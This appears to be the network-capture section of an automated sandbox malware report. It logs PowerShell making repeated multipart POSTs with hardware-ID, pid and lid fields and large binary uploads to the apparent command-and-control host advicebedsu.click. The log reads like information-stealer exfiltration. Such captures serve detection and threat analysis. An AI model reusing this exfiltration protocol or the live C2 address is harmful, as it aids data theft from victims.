4d 68
                                                                                    Data Ascii: SaLhPBLBW/Lmw5DY8x8T/A/2SKC9+MUs0hSShE9Z7UBxvtQJcsBOyu6moZHvs9ekf+9EMP2MpRyqYJ6MeyH9AUiH0HlvhHaqqof87JIfPvg7903dofixOK4UoqxjWcVUXZbgDXfhU+Lm07jY4x9n/BfWaISE1bQAhlmz6XehiVwpipE1u80zjqbz4Onnm1fIK9JQ/aGptWWaJIOJFnnJUHmyzAVP9UvW3vuIyKcbT9gX5nj0ifzFJL4Miqg/dMh
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 41 42 79 6f 5a 4c 4c 30 38 64 64 79 65 39 47 57 70 6b 6e 45 6b 43 45 6d 63 6a 56 52 61 36 38 68 71 52 48 54 66 56 74 53 49 66 51 4a 48 4b 67 4e 76 50 79 31 2b 58 78 6a 6d 59 53 6c 58 4b 4c 45 66 33 70 71 62 56 6c 6d 6d 47 7a 36 54 35 41 79 51 6c 49 33 39 45 68 66 34 6b 2f 30 76 36 66 72 65 77 58 33 39 65 6b 66 2b 34 68 74 44 6e 49 79 53 54 43 44 50 70 77 6a 38 48 39 52 45 57 48 32 50 6b 72 39 54 66 47 35 74 74 59 43 4e 63 37 43 2b 51 66 33 6b 32 39 6d 4e 53 77 41 66 72 64 73 36 6c 33 68 50 42 41 4b 4c 2b 78 50 61 66 4e 54 2f 4c 75 6e 2b 58 45 59 33 73 44 30 45 72 4f 31 4b 44 6c 38 4e 55 30 30 7a 6d 4c 69 47 35 34 71 41 46 77 76 73 42 34 63 71 41 32 67 35 2b 53 37 61 32 75 62 79 62 41 51 73 59 56 76 63 43 64 74 41 44 54 4f 64 4f 4a 61 33 57 42 43 46 47 79
                                                                                    Data Ascii: AByoZLL08ddye9GWpknEkCEmcjVRa68hqRHTfVtSIfQJHKgNvPy1+XxjmYSlXKLEf3pqbVlmmGz6T5AyQlI39Ehf4k/0v6frewX39ekf+4htDnIySTCDPpwj8H9REWH2Pkr9TfG5ttYCNc7C+Qf3k29mNSwAfrds6l3hPBAKL+xPafNT/Lun+XEY3sD0ErO1KDl8NU00zmLiG54qAFwvsB4cqA2g5+S7a2ubybAQsYVvcCdtADTOdOJa3WBCFGy
                                                                                    2024-12-30 08:19:25 UTC1369INData Raw: 78 4f 79 75 4b 43 6f 5a 47 75 62 6a 61 74 61 70 73 4e 39 4e 7a 73 36 41 44 44 4f 64 50 42 54 6e 6d 41 51 53 69 2f 7a 44 45 37 69 57 2f 47 71 73 71 38 43 42 66 7a 56 38 41 66 32 68 52 6f 72 5a 43 42 41 4c 62 41 53 67 78 50 56 64 56 77 45 55 59 6f 36 58 2f 35 54 39 61 71 67 71 48 4a 37 78 70 61 6d 4d 4c 48 62 62 78 63 37 59 31 68 6d 31 6d 79 58 48 74 42 38 56 77 52 2b 2b 54 70 66 34 56 37 79 74 2f 47 6d 66 44 32 4a 6a 71 78 48 73 5a 63 2b 61 43 31 7a 45 6e 33 62 66 2f 56 4e 6a 47 30 65 43 79 2b 69 54 77 53 69 45 37 4b 75 38 62 42 38 66 4d 72 45 37 41 2f 79 68 53 78 76 53 78 31 6d 4a 59 6b 71 6f 52 50 4a 59 78 49 39 62 4c 38 44 55 50 64 4c 7a 49 4b 6b 36 7a 49 31 7a 73 44 76 53 62 2f 54 49 47 67 74 47 67 41 33 68 43 76 75 56 5a 4a 6a 51 78 78 6b 6f 67 67 63
                                                                                    Data Ascii: xOyuKCoZGubjatapsN9Nzs6ADDOdPBTnmAQSi/zDE7iW/Gqsq8CBfzV8Af2hRorZCBALbASgxPVdVwEUYo6X/5T9aqgqHJ7xpamMLHbbxc7Y1hm1myXHtB8VwR++Tpf4V7yt/GmfD2JjqxHsZc+aC1zEn3bf/VNjG0eCy+iTwSiE7Ku8bB8fMrE7A/yhSxvSx1mJYkqoRPJYxI9bL8DUPdLzIKk6zI1zsDvSb/TIGgtGgA3hCvuVZJjQxxkoggc


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449930104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:25 UTC279OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=BXOEAC8LGUS0U8
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 18140
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:25 UTC15331OUTData Raw: 2d 2d 42 58 4f 45 41 43 38 4c 47 55 53 30 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 42 58 4f 45 41 43 38 4c 47 55 53 30 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 58 4f 45 41 43 38 4c 47 55 53 30 55 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 0d 0a 2d 2d 42 58 4f 45 41 43 38
                                                                                    Data Ascii: --BXOEAC8LGUS0U8Content-Disposition: form-data; name="hwid"3F80F8A27EF79AB7BEBA0C6A975F1733--BXOEAC8LGUS0U8Content-Disposition: form-data; name="pid"2--BXOEAC8LGUS0U8Content-Disposition: form-data; name="lid"yJEcaG--singl5--BXOEAC8
                                                                                    2024-12-30 08:19:25 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                    Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                    2024-12-30 08:19:26 UTC1139INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=pv7gq230i7drgeq6n20qt2bol7; expires=Fri, 25 Apr 2025 02:06:05 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lcxeMqIX1Y6cjKQECV%2BL%2FsTFjMjvH4rQNrTDIcG3oyKKhTlP%2BjFHLUM3O7UAr4MzUnYb4G0O%2B0Slj7yF9SiefEAJ%2B7C1yrL0Vnp%2FLFhcLjKIDB3NuZDwzIF62hOT95S4Uuz6yA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09ad7bc04de99-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1469&rtt_var=562&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19099&delivery_rate=1929940&cwnd=209&unsent_bytes=0&cid=463ec04b419c44ea&ts=552&x=0"
                                                                                    2024-12-30 08:19:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-30 08:19:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449940104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:26 UTC277OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=GV7D45M6XOHU3
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8755
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:26 UTC8755OUTData Raw: 2d 2d 47 56 37 44 34 35 4d 36 58 4f 48 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 56 37 44 34 35 4d 36 58 4f 48 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 56 37 44 34 35 4d 36 58 4f 48 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 0d 0a 2d 2d 47 56 37 44 34 35 4d 36 58 4f
                                                                                    Data Ascii: --GV7D45M6XOHU3Content-Disposition: form-data; name="hwid"3F80F8A27EF79AB7BEBA0C6A975F1733--GV7D45M6XOHU3Content-Disposition: form-data; name="pid"2--GV7D45M6XOHU3Content-Disposition: form-data; name="lid"yJEcaG--singl5--GV7D45M6XO
                                                                                    2024-12-30 08:19:27 UTC1133INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=dgiml3mqiqskj6ha0k8jr0rhv0; expires=Fri, 25 Apr 2025 02:06:06 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LVm693aMYZYP6TPBlLj3%2F6ILNzu6Tca0WSZhoQCpy8NTyBt1iE%2F%2B2Vn9Hve7uG4hXpVn0sltV7hn1ppuFY1urigRWHcirqalGAtj8PxynLq2%2FTHJNZbXJMbNFLM5VrKSvSXxsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09ade09744211-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2401&min_rtt=2326&rtt_var=1023&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9690&delivery_rate=996247&cwnd=239&unsent_bytes=0&cid=38b27984a06650d0&ts=488&x=0"
                                                                                    2024-12-30 08:19:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-30 08:19:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449947104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:28 UTC274OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=DAE0IDGYH
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20384
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:28 UTC15331OUTData Raw: 2d 2d 44 41 45 30 49 44 47 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 44 41 45 30 49 44 47 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 41 45 30 49 44 47 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 0d 0a 2d 2d 44 41 45 30 49 44 47 59 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                    Data Ascii: --DAE0IDGYHContent-Disposition: form-data; name="hwid"3F80F8A27EF79AB7BEBA0C6A975F1733--DAE0IDGYHContent-Disposition: form-data; name="pid"3--DAE0IDGYHContent-Disposition: form-data; name="lid"yJEcaG--singl5--DAE0IDGYHContent-Dis
                                                                                    2024-12-30 08:19:28 UTC5053OUTData Raw: 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7
                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                    2024-12-30 08:19:28 UTC1143INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=20jbneqd9dsglkrsqk88k3aqd9; expires=Fri, 25 Apr 2025 02:06:07 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDva%2FcxTS%2FVkmMUujJp9dfq1zPK2JcGY3V%2FuS5%2BptYsQbrxWkjGt9XkAZCtyn5YkVPEUry1%2Bx9k435F3Rr0A3aV0%2F9xpvGRaSoW%2BCEGgCwullVacoDKt%2BzlKQEG4ZLDKaOvwIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09ae4ee5872b3-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1909&rtt_var=730&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21338&delivery_rate=1483739&cwnd=172&unsent_bytes=0&cid=bb3a3673030b780f&ts=572&x=0"
                                                                                    2024-12-30 08:19:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-30 08:19:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449956104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:29 UTC283OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=LTCEQR1V02DCUIQE3XS
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1259
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:29 UTC1259OUTData Raw: 2d 2d 4c 54 43 45 51 52 31 56 30 32 44 43 55 49 51 45 33 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 54 43 45 51 52 31 56 30 32 44 43 55 49 51 45 33 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 54 43 45 51 52 31 56 30 32 44 43 55 49 51 45 33 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69
                                                                                    Data Ascii: --LTCEQR1V02DCUIQE3XSContent-Disposition: form-data; name="hwid"3F80F8A27EF79AB7BEBA0C6A975F1733--LTCEQR1V02DCUIQE3XSContent-Disposition: form-data; name="pid"1--LTCEQR1V02DCUIQE3XSContent-Disposition: form-data; name="lid"yJEcaG--si
                                                                                    2024-12-30 08:19:29 UTC1132INHTTP/1.1 200 OK
                                                                                    Date: Mon, 30 Dec 2024 08:19:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=r2vfbmrljhiuknk6aql8r90r9g; expires=Fri, 25 Apr 2025 02:06:08 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WkymX5Ih6ZtKBrEzPoWjMyd9SHRT5MZtPLYxb%2BiQn%2FvUqYCzx6mnBKnq%2FCfcFx0W%2B2URmFIxud4BXPn2TYY0Dz4zeWgqoGBYbT40S3j0IblEWq3kEjk9xJw68bNIWljiE9qoJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8fa09aebd8c2de98-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1547&rtt_var=592&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2178&delivery_rate=1887524&cwnd=212&unsent_bytes=0&cid=b709e63fb25ba882&ts=414&x=0"
                                                                                    2024-12-30 08:19:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2024-12-30 08:19:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449965104.21.84.2414437652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-30 08:19:30 UTC282OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=MXLJWJKRJMSEZ522
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 570957
                                                                                    Host: advicebedsu.click
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 2d 2d 4d 58 4c 4a 57 4a 4b 52 4a 4d 53 45 5a 35 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 38 30 46 38 41 32 37 45 46 37 39 41 42 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4d 58 4c 4a 57 4a 4b 52 4a 4d 53 45 5a 35 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 58 4c 4a 57 4a 4b 52 4a 4d 53 45 5a 35 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 35 0d 0a 2d 2d 4d
                                                                                    Data Ascii: --MXLJWJKRJMSEZ522Content-Disposition: form-data; name="hwid"3F80F8A27EF79AB7BEBA0C6A975F1733--MXLJWJKRJMSEZ522Content-Disposition: form-data; name="pid"1--MXLJWJKRJMSEZ522Content-Disposition: form-data; name="lid"yJEcaG--singl5--M
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a
                                                                                    Data Ascii: OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j
                                                                                    2024-12-30 08:19:30 UTC15331OUTData Raw: 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d
                                                                                    Data Ascii: *w~V<.iQx;8%Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]
